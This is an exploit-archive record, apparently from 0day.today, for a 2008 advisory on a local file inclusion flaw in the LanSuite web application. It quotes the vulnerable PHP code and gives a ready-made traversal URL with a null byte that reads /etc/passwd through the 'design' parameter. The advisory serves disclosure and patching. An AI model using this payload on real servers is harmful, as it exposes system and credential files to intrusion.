LanSuite 3.3.2 (design) Local File Inclusion Vulnerability

{"type": "zdt", "lastseen": "2016-04-20T02:07:55", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "LanSuite 3.3.2 (design) Local File Inclusion Vulnerability", "published": "2008-09-25T00:00:00", "href": "http://0day.today/exploit/description/3751", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for unknown platform in category web applications", "hash": "219bca4b8c7f760ce534c34ae52f5b5462d481577a71737c9bf02b87838c83c5", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "==========================================================\r\nLanSuite 3.3.2 (design) Local File Inclusion Vulnerability\r\n==========================================================\r\n\r\n\r\n :::::::-. ... ::::::. :::.\r\n ;;, `';, ;; ;;;`;;;;, `;;;\r\n `[[ [[[[' [[[ [[[[[. '[[\r\n $$, $$$$ $$$ $$$ \"Y$c$$\r\n 888_,o8P'88 .d888 888 Y88\r\n MMMMP\"` \"YmmMMMM\"\" MMM YM\r\n\r\n [ Discovered by dun ]\r\n\r\n ##########################################################################\r\n # [ lansuite <= 3.4 beta r1363 ] Local File Inclusion Vulnerability #\r\n ##########################################################################\r\n #\r\n # Script: \"Lansuite - Webbased LAN-Party Management System\"\r\n #\r\n # Script site: http://lansuite.orgapage.de\r\n # Download: http://sourceforge.net/project/showfiles.php?group_id=105885\r\n #\r\n # Vuln: \r\n # http://site.com/[lansuite-3.4_beta_r1363]/index.php?design=../../../../../../../../../../etc/passwd%00\r\n # \r\n #\r\n # Bug: ./lansuite-3.4_beta_r1363/index.php (lines: 243-254)\r\n #\r\n # ...\r\n #\tif (!$auth[\"design\"]) $auth[\"design\"] = \"simple\";\r\n #\tif (!file_exists(\"design/{$auth[\"design\"]}/templates/index.php\")) $auth[\"design\"] = \"simple\";\r\n #\t$_SESSION[\"auth\"][\"design\"] = $auth[\"design\"];\r\n #\tif ($_GET['design'] and $_GET['design'] != 'popup' and $_GET['design'] != 'base') $auth['design'] = $_GET['design']; // [1]\r\n #\r\n #\t// Statistic Functions (for generating server- and usage-statistics)\r\n #\tif ($db->success)\t$stats = new stats();\r\n #\r\n #\t// Boxes\r\n #\tif (!$IsAboutToInstall and !$_GET['contentonly'] and $_GET['design'] != 'base') include_once(\"modules/boxes/class_boxes.php\");\r\n #\r\n #\tif ($_GET['design'] != 'base') include_once('design/'. $auth['design'] .'/templates/index.php'); \t\t\t // [2] LFI\r\n # ... \t\t\t \r\n #\r\n #\r\n ###############################################\r\n\r\n [ dun / 2008 ] \r\n\r\n*******************************************************************************************\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-3751", "sourceHref": "http://0day.today/exploit/3751", "modified": "2008-09-25T00:00:00", "reporter": "dun", "enchantments": {"vulnersScore": 6.9}}